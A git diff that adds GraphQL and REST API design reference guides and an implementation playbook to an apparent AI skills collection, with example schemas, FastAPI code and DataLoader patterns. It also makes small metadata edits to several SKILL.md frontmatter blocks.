+type UserConnection {
+ edges: [UserEdge!]!
+ pageInfo: PageInfo!
+ totalCount: Int!
+}
+
+type UserEdge {
+ node: User!
+ cursor: String!
+}
+
+type PageInfo {
+ hasNextPage: Boolean!
+ hasPreviousPage: Boolean!
+ startCursor: String
+ endCursor: String
+}
+
+type Query {
+ users(first: Int, after: String, last: Int, before: String): UserConnection!
+}
+
+# Usage
+{
+ users(first: 10, after: "cursor123") {
+ edges {
+ cursor
+ node {
+ id
+ name
+ }
+ }
+ pageInfo {
+ hasNextPage
+ endCursor
+ }
+ }
+}
+```
+
+### Offset Pagination (Simpler)
+
+```graphql
+type UserList {
+ items: [User!]!
+ total: Int!
+ page: Int!
+ pageSize: Int!
+}
+
+type Query {
+ users(page: Int = 1, pageSize: Int = 20): UserList!
+}
+```
+
+## Mutation Design Patterns
+
+### 1. Input/Payload Pattern
+
+```graphql
+input CreatePostInput {
+ title: String!
+ content: String!
+ tags: [String!]
+}
+
+type CreatePostPayload {
+ post: Post
+ errors: [Error!]
+ success: Boolean!
+}
+
+type Error {
+ field: String
+ message: String!
+ code: String!
+}
+
+type Mutation {
+ createPost(input: CreatePostInput!): CreatePostPayload!
+}
+```
+
+### 2. Optimistic Response Support
+
+```graphql
+type UpdateUserPayload {
+ user: User
+ clientMutationId: String
+ errors: [Error!]
+}
+
+input UpdateUserInput {
+ id: ID!
+ name: String
+ clientMutationId: String
+}
+
+type Mutation {
+ updateUser(input: UpdateUserInput!): UpdateUserPayload!
+}
+```
+
+### 3. Batch Mutations
+
+```graphql
+input BatchCreateUserInput {
+ users: [CreateUserInput!]!
+}
+
+type BatchCreateUserPayload {
+ results: [CreateUserResult!]!
+ successCount: Int!
+ errorCount: Int!
+}
+
+type CreateUserResult {
+ user: User
+ errors: [Error!]
+ index: Int!
+}
+
+type Mutation {
+ batchCreateUsers(input: BatchCreateUserInput!): BatchCreateUserPayload!
+}
+```
+
+## Field Design
+
+### Arguments and Filtering
+
+```graphql
+type Query {
+ posts(
+ # Pagination
+ first: Int = 20
+ after: String
+
+ # Filtering
+ status: PostStatus
+ authorId: ID
+ tag: String
+
+ # Sorting
+ orderBy: PostOrderBy = CREATED_AT
+ orderDirection: OrderDirection = DESC
+
+ # Searching
+ search: String
+ ): PostConnection!
+}
+
+enum PostStatus {
+ DRAFT
+ PUBLISHED
+ ARCHIVED
+}
+
+enum PostOrderBy {
+ CREATED_AT
+ UPDATED_AT
+ TITLE
+}
+
+enum OrderDirection {
+ ASC
+ DESC
+}
+```
+
+### Computed Fields
+
+```graphql
+type User {
+ firstName: String!
+ lastName: String!
+ fullName: String! # Computed in resolver
+ posts: [Post!]!
+ postCount: Int! # Computed, doesn't load all posts
+}
+
+type Post {
+ likeCount: Int!
+ commentCount: Int!
+ isLikedByViewer: Boolean! # Context-dependent
+}
+```
+
+## Subscriptions
+
+```graphql
+type Subscription {
+ postAdded: Post!
+
+ postUpdated(postId: ID!): Post!
+
+ userStatusChanged(userId: ID!): UserStatus!
+}
+
+type UserStatus {
+ userId: ID!
+ online: Boolean!
+ lastSeen: DateTime!
+}
+
+# Client usage
+subscription {
+ postAdded {
+ id
+ title
+ author {
+ name
+ }
+ }
+}
+```
+
+## Custom Scalars
+
+```graphql
+scalar DateTime
+scalar Email
+scalar URL
+scalar JSON
+scalar Money
+
+type User {
+ email: Email!
+ website: URL
+ createdAt: DateTime!
+ metadata: JSON
+}
+
+type Product {
+ price: Money!
+}
+```
+
+## Directives
+
+### Built-in Directives
+
+```graphql
+type User {
+ name: String!
+ email: String! @deprecated(reason: "Use emails field instead")
+ emails: [String!]!
+
+ # Conditional inclusion
+ privateData: PrivateData @include(if: $isOwner)
+}
+
+# Query
+query GetUser($isOwner: Boolean!) {
+ user(id: "123") {
+ name
+ privateData @include(if: $isOwner) {
+ ssn
+ }
+ }
+}
+```
+
+### Custom Directives
+
+```graphql
+directive @auth(requires: Role = USER) on FIELD_DEFINITION
+
+enum Role {
+ USER
+ ADMIN
+ MODERATOR
+}
+
+type Mutation {
+ deleteUser(id: ID!): Boolean! @auth(requires: ADMIN)
+ updateProfile(input: ProfileInput!): User! @auth
+}
+```
+
+## Error Handling
+
+### Union Error Pattern
+
+```graphql
+type User {
+ id: ID!
+ email: String!
+}
+
+type ValidationError {
+ field: String!
+ message: String!
+}
+
+type NotFoundError {
+ message: String!
+ resourceType: String!
+ resourceId: ID!
+}
+
+type AuthorizationError {
+ message: String!
+}
+
+union UserResult = User | ValidationError | NotFoundError | AuthorizationError
+
+type Query {
+ user(id: ID!): UserResult!
+}
+
+# Usage
+{
+ user(id: "123") {
+ ... on User {
+ id
+ email
+ }
+ ... on NotFoundError {
+ message
+ resourceType
+ }
+ ... on AuthorizationError {
+ message
+ }
+ }
+}
+```
+
+### Errors in Payload
+
+```graphql
+type CreateUserPayload {
+ user: User
+ errors: [Error!]
+ success: Boolean!
+}
+
+type Error {
+ field: String
+ message: String!
+ code: ErrorCode!
+}
+
+enum ErrorCode {
+ VALIDATION_ERROR
+ UNAUTHORIZED
+ NOT_FOUND
+ INTERNAL_ERROR
+}
+```
+
+## N+1 Query Problem Solutions
+
+### DataLoader Pattern
+
+```python
+from aiodataloader import DataLoader
+
+class PostLoader(DataLoader):
+ async def batch_load_fn(self, post_ids):
+ posts = await db.posts.find({"id": {"$in": post_ids}})
+ post_map = {post["id"]: post for post in posts}
+ return [post_map.get(pid) for pid in post_ids]
+
+# Resolver
+@user_type.field("posts")
+async def resolve_posts(user, info):
+ loader = info.context["loaders"]["post"]
+ return await loader.load_many(user["post_ids"])
+```
+
+### Query Depth Limiting
+
+```python
+from graphql import GraphQLError
+
+def depth_limit_validator(max_depth: int):
+ def validate(context, node, ancestors):
+ depth = len(ancestors)
+ if depth > max_depth:
+ raise GraphQLError(
+ f"Query depth {depth} exceeds maximum {max_depth}"
+ )
+ return validate
+```
+
+### Query Complexity Analysis
+
+```python
+def complexity_limit_validator(max_complexity: int):
+ def calculate_complexity(node):
+ # Each field = 1, lists multiply
+ complexity = 1
+ if is_list_field(node):
+ complexity *= get_list_size_arg(node)
+ return complexity
+
+ return validate_complexity
+```
+
+## Schema Versioning
+
+### Field Deprecation
+
+```graphql
+type User {
+ name: String! @deprecated(reason: "Use firstName and lastName")
+ firstName: String!
+ lastName: String!
+}
+```
+
+### Schema Evolution
+
+```graphql
+# v1 - Initial
+type User {
+ name: String!
+}
+
+# v2 - Add optional field (backward compatible)
+type User {
+ name: String!
+ email: String
+}
+
+# v3 - Deprecate and add new field
+type User {
+ name: String! @deprecated(reason: "Use firstName/lastName")
+ firstName: String!
+ lastName: String!
+ email: String
+}
+```
+
+## Best Practices Summary
+
+1. **Nullable vs Non-Null**: Start nullable, make non-null when guaranteed
+2. **Input Types**: Always use input types for mutations
+3. **Payload Pattern**: Return errors in mutation payloads
+4. **Pagination**: Use cursor-based for infinite scroll, offset for simple cases
+5. **Naming**: Use camelCase for fields, PascalCase for types
+6. **Deprecation**: Use `@deprecated` instead of removing fields
+7. **DataLoaders**: Always use for relationships to prevent N+1
+8. **Complexity Limits**: Protect against expensive queries
+9. **Custom Scalars**: Use for domain-specific types (Email, DateTime)
+10. **Documentation**: Document all fields with descriptions
diff --git a/web-app/public/skills/api-design-principles/references/rest-best-practices.md b/web-app/public/skills/api-design-principles/references/rest-best-practices.md
new file mode 100644
index 00000000..676be296
--- /dev/null
+++ b/web-app/public/skills/api-design-principles/references/rest-best-practices.md
@@ -0,0 +1,408 @@
+# REST API Best Practices
+
+## URL Structure
+
+### Resource Naming
+
+```
+# Good - Plural nouns
+GET /api/users
+GET /api/orders
+GET /api/products
+
+# Bad - Verbs or mixed conventions
+GET /api/getUser
+GET /api/user (inconsistent singular)
+POST /api/createOrder
+```
+
+### Nested Resources
+
+```
+# Shallow nesting (preferred)
+GET /api/users/{id}/orders
+GET /api/orders/{id}
+
+# Deep nesting (avoid)
+GET /api/users/{id}/orders/{orderId}/items/{itemId}/reviews
+# Better:
+GET /api/order-items/{id}/reviews
+```
+
+## HTTP Methods and Status Codes
+
+### GET - Retrieve Resources
+
+```
+GET /api/users → 200 OK (with list)
+GET /api/users/{id} → 200 OK or 404 Not Found
+GET /api/users?page=2 → 200 OK (paginated)
+```
+
+### POST - Create Resources
+
+```
+POST /api/users
+ Body: {"name": "John", "email": "john@example.com"}
+ → 201 Created
+ Location: /api/users/123
+ Body: {"id": "123", "name": "John", ...}
+
+POST /api/users (validation error)
+ → 422 Unprocessable Entity
+ Body: {"errors": [...]}
+```
+
+### PUT - Replace Resources
+
+```
+PUT /api/users/{id}
+ Body: {complete user object}
+ → 200 OK (updated)
+ → 404 Not Found (doesn't exist)
+
+# Must include ALL fields
+```
+
+### PATCH - Partial Update
+
+```
+PATCH /api/users/{id}
+ Body: {"name": "Jane"} (only changed fields)
+ → 200 OK
+ → 404 Not Found
+```
+
+### DELETE - Remove Resources
+
+```
+DELETE /api/users/{id}
+ → 204 No Content (deleted)
+ → 404 Not Found
+ → 409 Conflict (can't delete due to references)
+```
+
+## Filtering, Sorting, and Searching
+
+### Query Parameters
+
+```
+# Filtering
+GET /api/users?status=active
+GET /api/users?role=admin&status=active
+
+# Sorting
+GET /api/users?sort=created_at
+GET /api/users?sort=-created_at (descending)
+GET /api/users?sort=name,created_at
+
+# Searching
+GET /api/users?search=john
+GET /api/users?q=john
+
+# Field selection (sparse fieldsets)
+GET /api/users?fields=id,name,email
+```
+
+## Pagination Patterns
+
+### Offset-Based Pagination
+
+```python
+GET /api/users?page=2&page_size=20
+
+Response:
+{
+ "items": [...],
+ "page": 2,
+ "page_size": 20,
+ "total": 150,
+ "pages": 8
+}
+```
+
+### Cursor-Based Pagination (for large datasets)
+
+```python
+GET /api/users?limit=20&cursor=eyJpZCI6MTIzfQ
+
+Response:
+{
+ "items": [...],
+ "next_cursor": "eyJpZCI6MTQzfQ",
+ "has_more": true
+}
+```
+
+### Link Header Pagination (RESTful)
+
+```
+GET /api/users?page=2
+
+Response Headers:
+Link: ; rel="next",
+ ; rel="prev",
+ ; rel="first",
+ ; rel="last"
+```
+
+## Versioning Strategies
+
+### URL Versioning (Recommended)
+
+```
+/api/v1/users
+/api/v2/users
+
+Pros: Clear, easy to route
+Cons: Multiple URLs for same resource
+```
+
+### Header Versioning
+
+```
+GET /api/users
+Accept: application/vnd.api+json; version=2
+
+Pros: Clean URLs
+Cons: Less visible, harder to test
+```
+
+### Query Parameter
+
+```
+GET /api/users?version=2
+
+Pros: Easy to test
+Cons: Optional parameter can be forgotten
+```
+
+## Rate Limiting
+
+### Headers
+
+```
+X-RateLimit-Limit: 1000
+X-RateLimit-Remaining: 742
+X-RateLimit-Reset: 1640000000
+
+Response when limited:
+429 Too Many Requests
+Retry-After: 3600
+```
+
+### Implementation Pattern
+
+```python
+from fastapi import HTTPException, Request
+from datetime import datetime, timedelta
+
+class RateLimiter:
+ def __init__(self, calls: int, period: int):
+ self.calls = calls
+ self.period = period
+ self.cache = {}
+
+ def check(self, key: str) -> bool:
+ now = datetime.now()
+ if key not in self.cache:
+ self.cache[key] = []
+
+ # Remove old requests
+ self.cache[key] = [
+ ts for ts in self.cache[key]
+ if now - ts < timedelta(seconds=self.period)
+ ]
+
+ if len(self.cache[key]) >= self.calls:
+ return False
+
+ self.cache[key].append(now)
+ return True
+
+limiter = RateLimiter(calls=100, period=60)
+
+@app.get("/api/users")
+async def get_users(request: Request):
+ if not limiter.check(request.client.host):
+ raise HTTPException(
+ status_code=429,
+ headers={"Retry-After": "60"}
+ )
+ return {"users": [...]}
+```
+
+## Authentication and Authorization
+
+### Bearer Token
+
+```
+Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
+
+401 Unauthorized - Missing/invalid token
+403 Forbidden - Valid token, insufficient permissions
+```
+
+### API Keys
+
+```
+X-API-Key: your-api-key-here
+```
+
+## Error Response Format
+
+### Consistent Structure
+
+```json
+{
+ "error": {
+ "code": "VALIDATION_ERROR",
+ "message": "Request validation failed",
+ "details": [
+ {
+ "field": "email",
+ "message": "Invalid email format",
+ "value": "not-an-email"
+ }
+ ],
+ "timestamp": "2025-10-16T12:00:00Z",
+ "path": "/api/users"
+ }
+}
+```
+
+### Status Code Guidelines
+
+- `200 OK`: Successful GET, PATCH, PUT
+- `201 Created`: Successful POST
+- `204 No Content`: Successful DELETE
+- `400 Bad Request`: Malformed request
+- `401 Unauthorized`: Authentication required
+- `403 Forbidden`: Authenticated but not authorized
+- `404 Not Found`: Resource doesn't exist
+- `409 Conflict`: State conflict (duplicate email, etc.)
+- `422 Unprocessable Entity`: Validation errors
+- `429 Too Many Requests`: Rate limited
+- `500 Internal Server Error`: Server error
+- `503 Service Unavailable`: Temporary downtime
+
+## Caching
+
+### Cache Headers
+
+```
+# Client caching
+Cache-Control: public, max-age=3600
+
+# No caching
+Cache-Control: no-cache, no-store, must-revalidate
+
+# Conditional requests
+ETag: "33a64df551425fcc55e4d42a148795d9f25f89d4"
+If-None-Match: "33a64df551425fcc55e4d42a148795d9f25f89d4"
+→ 304 Not Modified
+```
+
+## Bulk Operations
+
+### Batch Endpoints
+
+```python
+POST /api/users/batch
+{
+ "items": [
+ {"name": "User1", "email": "user1@example.com"},
+ {"name": "User2", "email": "user2@example.com"}
+ ]
+}
+
+Response:
+{
+ "results": [
+ {"id": "1", "status": "created"},
+ {"id": null, "status": "failed", "error": "Email already exists"}
+ ]
+}
+```
+
+## Idempotency
+
+### Idempotency Keys
+
+```
+POST /api/orders
+Idempotency-Key: unique-key-123
+
+If duplicate request:
+→ 200 OK (return cached response)
+```
+
+## CORS Configuration
+
+```python
+from fastapi.middleware.cors import CORSMiddleware
+
+app.add_middleware(
+ CORSMiddleware,
+ allow_origins=["https://example.com"],
+ allow_credentials=True,
+ allow_methods=["*"],
+ allow_headers=["*"],
+)
+```
+
+## Documentation with OpenAPI
+
+```python
+from fastapi import FastAPI
+
+app = FastAPI(
+ title="My API",
+ description="API for managing users",
+ version="1.0.0",
+ docs_url="/docs",
+ redoc_url="/redoc"
+)
+
+@app.get(
+ "/api/users/{user_id}",
+ summary="Get user by ID",
+ response_description="User details",
+ tags=["Users"]
+)
+async def get_user(
+ user_id: str = Path(..., description="The user ID")
+):
+ """
+ Retrieve user by ID.
+
+ Returns full user profile including:
+ - Basic information
+ - Contact details
+ - Account status
+ """
+ pass
+```
+
+## Health and Monitoring Endpoints
+
+```python
+@app.get("/health")
+async def health_check():
+ return {
+ "status": "healthy",
+ "version": "1.0.0",
+ "timestamp": datetime.now().isoformat()
+ }
+
+@app.get("/health/detailed")
+async def detailed_health():
+ return {
+ "status": "healthy",
+ "checks": {
+ "database": await check_database(),
+ "redis": await check_redis(),
+ "external_api": await check_external_api()
+ }
+ }
+```
diff --git a/web-app/public/skills/api-design-principles/resources/implementation-playbook.md b/web-app/public/skills/api-design-principles/resources/implementation-playbook.md
new file mode 100644
index 00000000..b2ca6bd7
--- /dev/null
+++ b/web-app/public/skills/api-design-principles/resources/implementation-playbook.md
@@ -0,0 +1,513 @@
+# API Design Principles Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Core Concepts
+
+### 1. RESTful Design Principles
+
+**Resource-Oriented Architecture**
+
+- Resources are nouns (users, orders, products), not verbs
+- Use HTTP methods for actions (GET, POST, PUT, PATCH, DELETE)
+- URLs represent resource hierarchies
+- Consistent naming conventions
+
+**HTTP Methods Semantics:**
+
+- `GET`: Retrieve resources (idempotent, safe)
+- `POST`: Create new resources
+- `PUT`: Replace entire resource (idempotent)
+- `PATCH`: Partial resource updates
+- `DELETE`: Remove resources (idempotent)
+
+### 2. GraphQL Design Principles
+
+**Schema-First Development**
+
+- Types define your domain model
+- Queries for reading data
+- Mutations for modifying data
+- Subscriptions for real-time updates
+
+**Query Structure:**
+
+- Clients request exactly what they need
+- Single endpoint, multiple operations
+- Strongly typed schema
+- Introspection built-in
+
+### 3. API Versioning Strategies
+
+**URL Versioning:**
+
+```
+/api/v1/users
+/api/v2/users
+```
+
+**Header Versioning:**
+
+```
+Accept: application/vnd.api+json; version=1
+```
+
+**Query Parameter Versioning:**
+
+```
+/api/users?version=1
+```
+
+## REST API Design Patterns
+
+### Pattern 1: Resource Collection Design
+
+```python
+# Good: Resource-oriented endpoints
+GET /api/users # List users (with pagination)
+POST /api/users # Create user
+GET /api/users/{id} # Get specific user
+PUT /api/users/{id} # Replace user
+PATCH /api/users/{id} # Update user fields
+DELETE /api/users/{id} # Delete user
+
+# Nested resources
+GET /api/users/{id}/orders # Get user's orders
+POST /api/users/{id}/orders # Create order for user
+
+# Bad: Action-oriented endpoints (avoid)
+POST /api/createUser
+POST /api/getUserById
+POST /api/deleteUser
+```
+
+### Pattern 2: Pagination and Filtering
+
+```python
+from typing import List, Optional
+from pydantic import BaseModel, Field
+
+class PaginationParams(BaseModel):
+ page: int = Field(1, ge=1, description="Page number")
+ page_size: int = Field(20, ge=1, le=100, description="Items per page")
+
+class FilterParams(BaseModel):
+ status: Optional[str] = None
+ created_after: Optional[str] = None
+ search: Optional[str] = None
+
+class PaginatedResponse(BaseModel):
+ items: List[dict]
+ total: int
+ page: int
+ page_size: int
+ pages: int
+
+ @property
+ def has_next(self) -> bool:
+ return self.page < self.pages
+
+ @property
+ def has_prev(self) -> bool:
+ return self.page > 1
+
+# FastAPI endpoint example
+from fastapi import FastAPI, Query, Depends
+
+app = FastAPI()
+
+@app.get("/api/users", response_model=PaginatedResponse)
+async def list_users(
+ page: int = Query(1, ge=1),
+ page_size: int = Query(20, ge=1, le=100),
+ status: Optional[str] = Query(None),
+ search: Optional[str] = Query(None)
+):
+ # Apply filters
+ query = build_query(status=status, search=search)
+
+ # Count total
+ total = await count_users(query)
+
+ # Fetch page
+ offset = (page - 1) * page_size
+ users = await fetch_users(query, limit=page_size, offset=offset)
+
+ return PaginatedResponse(
+ items=users,
+ total=total,
+ page=page,
+ page_size=page_size,
+ pages=(total + page_size - 1) // page_size
+ )
+```
+
+### Pattern 3: Error Handling and Status Codes
+
+```python
+from fastapi import HTTPException, status
+from pydantic import BaseModel
+
+class ErrorResponse(BaseModel):
+ error: str
+ message: str
+ details: Optional[dict] = None
+ timestamp: str
+ path: str
+
+class ValidationErrorDetail(BaseModel):
+ field: str
+ message: str
+ value: Any
+
+# Consistent error responses
+STATUS_CODES = {
+ "success": 200,
+ "created": 201,
+ "no_content": 204,
+ "bad_request": 400,
+ "unauthorized": 401,
+ "forbidden": 403,
+ "not_found": 404,
+ "conflict": 409,
+ "unprocessable": 422,
+ "internal_error": 500
+}
+
+def raise_not_found(resource: str, id: str):
+ raise HTTPException(
+ status_code=status.HTTP_404_NOT_FOUND,
+ detail={
+ "error": "NotFound",
+ "message": f"{resource} not found",
+ "details": {"id": id}
+ }
+ )
+
+def raise_validation_error(errors: List[ValidationErrorDetail]):
+ raise HTTPException(
+ status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
+ detail={
+ "error": "ValidationError",
+ "message": "Request validation failed",
+ "details": {"errors": [e.dict() for e in errors]}
+ }
+ )
+
+# Example usage
+@app.get("/api/users/{user_id}")
+async def get_user(user_id: str):
+ user = await fetch_user(user_id)
+ if not user:
+ raise_not_found("User", user_id)
+ return user
+```
+
+### Pattern 4: HATEOAS (Hypermedia as the Engine of Application State)
+
+```python
+class UserResponse(BaseModel):
+ id: str
+ name: str
+ email: str
+ _links: dict
+
+ @classmethod
+ def from_user(cls, user: User, base_url: str):
+ return cls(
+ id=user.id,
+ name=user.name,
+ email=user.email,
+ _links={
+ "self": {"href": f"{base_url}/api/users/{user.id}"},
+ "orders": {"href": f"{base_url}/api/users/{user.id}/orders"},
+ "update": {
+ "href": f"{base_url}/api/users/{user.id}",
+ "method": "PATCH"
+ },
+ "delete": {
+ "href": f"{base_url}/api/users/{user.id}",
+ "method": "DELETE"
+ }
+ }
+ )
+```
+
+## GraphQL Design Patterns
+
+### Pattern 1: Schema Design
+
+```graphql
+# schema.graphql
+
+# Clear type definitions
+type User {
+ id: ID!
+ email: String!
+ name: String!
+ createdAt: DateTime!
+
+ # Relationships
+ orders(first: Int = 20, after: String, status: OrderStatus): OrderConnection!
+
+ profile: UserProfile
+}
+
+type Order {
+ id: ID!
+ status: OrderStatus!
+ total: Money!
+ items: [OrderItem!]!
+ createdAt: DateTime!
+
+ # Back-reference
+ user: User!
+}
+
+# Pagination pattern (Relay-style)
+type OrderConnection {
+ edges: [OrderEdge!]!
+ pageInfo: PageInfo!
+ totalCount: Int!
+}
+
+type OrderEdge {
+ node: Order!
+ cursor: String!
+}
+
+type PageInfo {
+ hasNextPage: Boolean!
+ hasPreviousPage: Boolean!
+ startCursor: String
+ endCursor: String
+}
+
+# Enums for type safety
+enum OrderStatus {
+ PENDING
+ CONFIRMED
+ SHIPPED
+ DELIVERED
+ CANCELLED
+}
+
+# Custom scalars
+scalar DateTime
+scalar Money
+
+# Query root
+type Query {
+ user(id: ID!): User
+ users(first: Int = 20, after: String, search: String): UserConnection!
+
+ order(id: ID!): Order
+}
+
+# Mutation root
+type Mutation {
+ createUser(input: CreateUserInput!): CreateUserPayload!
+ updateUser(input: UpdateUserInput!): UpdateUserPayload!
+ deleteUser(id: ID!): DeleteUserPayload!
+
+ createOrder(input: CreateOrderInput!): CreateOrderPayload!
+}
+
+# Input types for mutations
+input CreateUserInput {
+ email: String!
+ name: String!
+ password: String!
+}
+
+# Payload types for mutations
+type CreateUserPayload {
+ user: User
+ errors: [Error!]
+}
+
+type Error {
+ field: String
+ message: String!
+}
+```
+
+### Pattern 2: Resolver Design
+
+```python
+from typing import Optional, List
+from ariadne import QueryType, MutationType, ObjectType
+from dataclasses import dataclass
+
+query = QueryType()
+mutation = MutationType()
+user_type = ObjectType("User")
+
+@query.field("user")
+async def resolve_user(obj, info, id: str) -> Optional[dict]:
+ """Resolve single user by ID."""
+ return await fetch_user_by_id(id)
+
+@query.field("users")
+async def resolve_users(
+ obj,
+ info,
+ first: int = 20,
+ after: Optional[str] = None,
+ search: Optional[str] = None
+) -> dict:
+ """Resolve paginated user list."""
+ # Decode cursor
+ offset = decode_cursor(after) if after else 0
+
+ # Fetch users
+ users = await fetch_users(
+ limit=first + 1, # Fetch one extra to check hasNextPage
+ offset=offset,
+ search=search
+ )
+
+ # Pagination
+ has_next = len(users) > first
+ if has_next:
+ users = users[:first]
+
+ edges = [
+ {
+ "node": user,
+ "cursor": encode_cursor(offset + i)
+ }
+ for i, user in enumerate(users)
+ ]
+
+ return {
+ "edges": edges,
+ "pageInfo": {
+ "hasNextPage": has_next,
+ "hasPreviousPage": offset > 0,
+ "startCursor": edges[0]["cursor"] if edges else None,
+ "endCursor": edges[-1]["cursor"] if edges else None
+ },
+ "totalCount": await count_users(search=search)
+ }
+
+@user_type.field("orders")
+async def resolve_user_orders(user: dict, info, first: int = 20) -> dict:
+ """Resolve user's orders (N+1 prevention with DataLoader)."""
+ # Use DataLoader to batch requests
+ loader = info.context["loaders"]["orders_by_user"]
+ orders = await loader.load(user["id"])
+
+ return paginate_orders(orders, first)
+
+@mutation.field("createUser")
+async def resolve_create_user(obj, info, input: dict) -> dict:
+ """Create new user."""
+ try:
+ # Validate input
+ validate_user_input(input)
+
+ # Create user
+ user = await create_user(
+ email=input["email"],
+ name=input["name"],
+ password=hash_password(input["password"])
+ )
+
+ return {
+ "user": user,
+ "errors": []
+ }
+ except ValidationError as e:
+ return {
+ "user": None,
+ "errors": [{"field": e.field, "message": e.message}]
+ }
+```
+
+### Pattern 3: DataLoader (N+1 Problem Prevention)
+
+```python
+from aiodataloader import DataLoader
+from typing import List, Optional
+
+class UserLoader(DataLoader):
+ """Batch load users by ID."""
+
+ async def batch_load_fn(self, user_ids: List[str]) -> List[Optional[dict]]:
+ """Load multiple users in single query."""
+ users = await fetch_users_by_ids(user_ids)
+
+ # Map results back to input order
+ user_map = {user["id"]: user for user in users}
+ return [user_map.get(user_id) for user_id in user_ids]
+
+class OrdersByUserLoader(DataLoader):
+ """Batch load orders by user ID."""
+
+ async def batch_load_fn(self, user_ids: List[str]) -> List[List[dict]]:
+ """Load orders for multiple users in single query."""
+ orders = await fetch_orders_by_user_ids(user_ids)
+
+ # Group orders by user_id
+ orders_by_user = {}
+ for order in orders:
+ user_id = order["user_id"]
+ if user_id not in orders_by_user:
+ orders_by_user[user_id] = []
+ orders_by_user[user_id].append(order)
+
+ # Return in input order
+ return [orders_by_user.get(user_id, []) for user_id in user_ids]
+
+# Context setup
+def create_context():
+ return {
+ "loaders": {
+ "user": UserLoader(),
+ "orders_by_user": OrdersByUserLoader()
+ }
+ }
+```
+
+## Best Practices
+
+### REST APIs
+
+1. **Consistent Naming**: Use plural nouns for collections (`/users`, not `/user`)
+2. **Stateless**: Each request contains all necessary information
+3. **Use HTTP Status Codes Correctly**: 2xx success, 4xx client errors, 5xx server errors
+4. **Version Your API**: Plan for breaking changes from day one
+5. **Pagination**: Always paginate large collections
+6. **Rate Limiting**: Protect your API with rate limits
+7. **Documentation**: Use OpenAPI/Swagger for interactive docs
+
+### GraphQL APIs
+
+1. **Schema First**: Design schema before writing resolvers
+2. **Avoid N+1**: Use DataLoaders for efficient data fetching
+3. **Input Validation**: Validate at schema and resolver levels
+4. **Error Handling**: Return structured errors in mutation payloads
+5. **Pagination**: Use cursor-based pagination (Relay spec)
+6. **Deprecation**: Use `@deprecated` directive for gradual migration
+7. **Monitoring**: Track query complexity and execution time
+
+## Common Pitfalls
+
+- **Over-fetching/Under-fetching (REST)**: Fixed in GraphQL but requires DataLoaders
+- **Breaking Changes**: Version APIs or use deprecation strategies
+- **Inconsistent Error Formats**: Standardize error responses
+- **Missing Rate Limits**: APIs without limits are vulnerable to abuse
+- **Poor Documentation**: Undocumented APIs frustrate developers
+- **Ignoring HTTP Semantics**: POST for idempotent operations breaks expectations
+- **Tight Coupling**: API structure shouldn't mirror database schema
+
+## Resources
+
+- **references/rest-best-practices.md**: Comprehensive REST API design guide
+- **references/graphql-schema-design.md**: GraphQL schema patterns and anti-patterns
+- **references/api-versioning-strategies.md**: Versioning approaches and migration paths
+- **assets/rest-api-template.py**: FastAPI REST API template
+- **assets/graphql-schema-template.graphql**: Complete GraphQL schema example
+- **assets/api-design-checklist.md**: Pre-implementation review checklist
+- **scripts/openapi-generator.py**: Generate OpenAPI specs from code
diff --git a/web-app/public/skills/api-documentation-generator/SKILL.md b/web-app/public/skills/api-documentation-generator/SKILL.md
index 572f9342..27f0bc05 100644
--- a/web-app/public/skills/api-documentation-generator/SKILL.md
+++ b/web-app/public/skills/api-documentation-generator/SKILL.md
@@ -3,6 +3,7 @@ name: api-documentation-generator
description: "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices"
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Documentation Generator
diff --git a/web-app/public/skills/api-documentation/SKILL.md b/web-app/public/skills/api-documentation/SKILL.md
index e8b77394..969c3bb2 100644
--- a/web-app/public/skills/api-documentation/SKILL.md
+++ b/web-app/public/skills/api-documentation/SKILL.md
@@ -1,11 +1,10 @@
---
name: api-documentation
description: "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation."
-source: personal
-risk: safe
-domain: documentation
category: granular-workflow-bundle
-version: 1.0.0
+risk: safe
+source: personal
+date_added: "2026-02-27"
---
# API Documentation Workflow
diff --git a/web-app/public/skills/api-documenter/SKILL.md b/web-app/public/skills/api-documenter/SKILL.md
index f3485bae..3ab03b22 100644
--- a/web-app/public/skills/api-documenter/SKILL.md
+++ b/web-app/public/skills/api-documenter/SKILL.md
@@ -1,14 +1,9 @@
---
name: api-documenter
-description: |
- Master API documentation with OpenAPI 3.1, AI-powered tools, and
- modern developer experience practices. Create interactive docs, generate SDKs,
- and build comprehensive developer portals. Use PROACTIVELY for API
- documentation or developer portal creation.
-metadata:
- model: sonnet
+description: Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.
risk: unknown
source: community
+date_added: '2026-02-27'
---
You are an expert API documentation specialist mastering modern developer experience through comprehensive, interactive, and AI-enhanced documentation.
diff --git a/web-app/public/skills/api-fuzzing-bug-bounty/SKILL.md b/web-app/public/skills/api-fuzzing-bug-bounty/SKILL.md
index 4b91f492..60906ad2 100644
--- a/web-app/public/skills/api-fuzzing-bug-bounty/SKILL.md
+++ b/web-app/public/skills/api-fuzzing-bug-bounty/SKILL.md
@@ -1,11 +1,9 @@
---
name: api-fuzzing-bug-bounty
description: "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b..."
-metadata:
- author: zebbern
- version: "1.1"
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Fuzzing for Bug Bounty
diff --git a/web-app/public/skills/api-patterns/SKILL.md b/web-app/public/skills/api-patterns/SKILL.md
index 48a0cfc8..f21b684c 100644
--- a/web-app/public/skills/api-patterns/SKILL.md
+++ b/web-app/public/skills/api-patterns/SKILL.md
@@ -1,9 +1,9 @@
---
name: api-patterns
description: "API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination."
-allowed-tools: Read, Write, Edit, Glob, Grep
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Patterns
diff --git a/web-app/public/skills/api-patterns/api-style.md b/web-app/public/skills/api-patterns/api-style.md
new file mode 100644
index 00000000..c94cb8a4
--- /dev/null
+++ b/web-app/public/skills/api-patterns/api-style.md
@@ -0,0 +1,42 @@
+# API Style Selection (2025)
+
+> REST vs GraphQL vs tRPC - Hangi durumda hangisi?
+
+## Decision Tree
+
+```
+Who are the API consumers?
+│
+├── Public API / Multiple platforms
